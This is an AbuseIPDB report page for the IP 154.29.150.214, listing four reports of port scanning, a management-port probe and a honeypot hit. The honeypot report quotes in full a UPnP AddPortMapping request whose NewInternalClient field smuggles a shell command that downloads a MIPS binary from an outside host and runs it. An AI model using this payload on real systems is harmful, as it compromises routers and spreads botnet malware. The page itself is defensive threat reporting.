JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 154.29.150.214

154.29.150.214 was found in our database!

This IP was reported 4 times. Confidence of Abuse is 29%: ?

29%

ISP	NetLab
Usage Type	Commercial
ASN	AS979
Domain Name	as979.net
Country	🇺🇸 United States of America
City	Los Angeles, California

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 154.29.150.214

Whois 154.29.150.214

IP Abuse Reports for 154.29.150.214:

This IP address has been reported a total of 4 times from 4 distinct sources. 154.29.150.214 was first reported on June 18th 2026, and the most recent report was 2 days ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇳🇱 VMHeaven.io	2026-06-18 14:50:09 (2 days ago)	Blocked by UFW [52869/tcp] Source port: 25706 TTL: 51 Packet length: 40	Port Scan
🇬🇧 OptimusGO	2026-06-18 14:28:02 (2 days ago)	Malicious activity detected: web_attack Server: commstackbc (185.127.18.66) Attack: web_attack Time ... show more Malicious activity detected: web_attack Server: commstackbc (185.127.18.66) Attack: web_attack Timestamp: 2026-06-18 15:28:02 UTC Log evidence: 06/18/2026-15:28:01.703267 [] [1:1000103:1] SECURITY Management Port Probe - CRITICAL [] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 154.29.150.214:24938 -> 185.127.18.66:8080 show less	Port Scan Brute-Force
🇳🇱 ByeByte API	2026-06-18 12:51:57 (2 days ago)	byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-18T12:51:57Z. Source por ... show more byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-18T12:51:57Z. Source port 24682. TCP flags: SYN. Packet: 40B, TTL 47, window 41625, IP id 4530. Single packet, dropped at firewall. p0f: 17 hops. show less	Port Scan
🇬🇧 gbzret4d	2026-06-18 12:51:51 (2 days ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot

Showing 1 to 4 of 4 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇫🇷 45.157.112.149

🇧🇷 205.210.31.225

🇧🇷 177.194.82.39

🇬🇧 144.126.229.67

🇨🇳 115.190.185.14

🇨🇳 113.215.195.209

🇮🇳 110.227.211.82

🇸🇬 101.32.242.137

🇧🇬 91.191.209.46

🇵🇱 85.237.212.26

🇨🇭 85.195.196.51

🇱🇹 81.30.98.158

🇺🇸 66.132.172.241

🇺🇸 47.251.168.192

🇰🇿 31.132.90.3

🇺🇸 20.15.160.31

🇨🇳 218.21.241.50

🇨🇳 218.1.142.243

🇳🇱 195.178.110.199

🇺🇸 162.216.149.66